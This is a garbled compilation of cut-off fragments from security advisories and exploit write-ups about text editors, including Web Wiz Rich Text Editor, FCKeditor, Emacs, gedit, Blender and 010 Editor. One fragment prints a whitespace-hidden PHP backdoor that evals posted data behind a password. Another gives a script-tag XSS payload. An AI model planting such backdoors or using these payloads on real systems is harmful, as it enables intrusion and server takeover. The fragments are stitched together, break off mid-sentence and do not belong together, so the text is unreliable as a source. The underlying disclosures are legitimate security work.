text editing
-######### [Saved] - [27-07-2008/13:10:02]
# .: Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02
# .: [Author] CSDT
# .: [Affected versions] http://www.webwizguide.com/ - Web Wiz Rich Text Editor (RTE) 4.02
# .: [Credit] The disclosure of these issues has been credited to autehoker of CSDT
# _____________________________________________________________________________________________ˆ
# .: [Script Description]
# (Description Provided by CVE) : Multiple cross-site scripting (XSS) vulnerabilities in
# Web Wiz Rich Text Editor (RTE) 4.02 and earlier, and 3.x versions, allow remote attackers
# to inject arbitrary web scripting. This flaw exists because the application does not validate
Changing the Management Console Username and Password
+----------------------------------------------------
Complete these steps:
1. Open the following file in a text editor:
$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/users.properties
Use the line admin=admin to set the username and password. The
full control of the machine where Blender is installed sending a
specially crafted .blend file and enticing the user to open it.
These are the steps to reproduce the issue:
. Open the "Text Editor" Panel.
. Right click on the canvas and select "New".
. Write your python code there. For instance:
/-----
import os
########################## WwW.BugReport.ir
###########################################
#
# AmnPardaz Security Research Team
#
# Title: Web Wiz Rich Text Editor(TM)
# Vendor: http://www.webwizguide.com/
# Bug: Directory traversal + HTM/HTML file creation on the server
# Vulnerable Version: 4.0
# Exploit: Available
# Fix Available: No! Fast Solution is available.
arbitrary code.
Background
==========
gedit is a text editor for the GNOME desktop.
Affected packages
=================
-------------------------------------------------------------------
#2009-007 FCKeditor input sanitization errors
Description:
FCKeditor, a web based open source HTML text editor, suffers from a remote
file upload vulnerability.
The input of several connector modules is not properly verified before being
used, this leads to exposure of the contents of arbitrary directories on the
server filesystem and allows file uploading to arbitrary locations. The
Backdoor in file:
/php/modules/entries/search.cache.inc.php
line 8:
$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash . '_info.dat';
if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ'){@eval(@stripslashes($_POST['e']));exit;};
the second string is hidden at the very right site with whitespaces in the texteditor, so nobody had seen it before,
the function is called in:
/php/modules/entries/search.main.inc.php
exploit:
-->
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
Background
==========
TRAMP is a remote file editing package for GNU Emacs, a highly
extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
3. Problem Description
a. Updated ESX patch updates Service Console package ed
ed is a line-oriented text editor, used to create, display, and
modify text files (both interactively and via shell scripts).
A heap-based buffer overflow was discovered in the way ed, the GNU
line editor, processed long file names. An attacker could create a
file with a specially-crafted name that could possibly execute an
Application: Obedit
Version: 3.03
Vendor: http://www.oblius.com/?projects.obedit
Description:
obedit is a Flash-based rich text editor. It will allow a user to edit text much like you would in an office-like application, with simple editing features like bold, italic, justification, block indents, text color, font and size selection, links, bullets, background color, and spell checking.
--------------------
Vulns:
--------------------
execution of arbitrary code.
Background
==========
GNU Emacs is a highly extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
Description
===========
David Bloom reported two vulnerabilities where plug-ins (CVE-2007-6520)
and Rich text editing (CVE-2007-6522) could be used to allow cross
domain scripting. Alexander Klink (Cynops GmbH) discovered an issue
with TLS certificates (CVE-2007-6521). Gynvael Coldwind reported that
bitmaps might reveal random data from memory (CVE-2007-6524).
Impact
Technical Explanation
=====================
The string below is not properly sanitized when the web page is saved
after adding a picture using the application's text editor:
"""></P></div></td><script>alert("bingo");</script>
The text between the script tags will be injected into the page upon
each successful edit and save operation, after the page is initially
user-assisted attackers to execute arbitrary code.
Background
==========
XEmacs is a highly extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
010 Editor Multiple Buffer Overflow Vulnerabilities
1. General Information
010 Editor is a text editor and hex editor, with a lot of functions as
view and edit binary files, analyze and edit binary data, import and
export binary data in many different formats.
Bkis has just found many vulnerabilities in the software, related to the
processing of 010 Editor Binary Template files (“.bt”) and 010 Editor
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 08, 2009
I. BACKGROUND
WordPad is the default text editing application included with nearly all
Windows versions since Windows 95. The Word97 converter is used to
convert Word documents into the format used by WordPad, and is present
in all current versions of WordPad except Vista and Server 2008.
II. DESCRIPTION
|
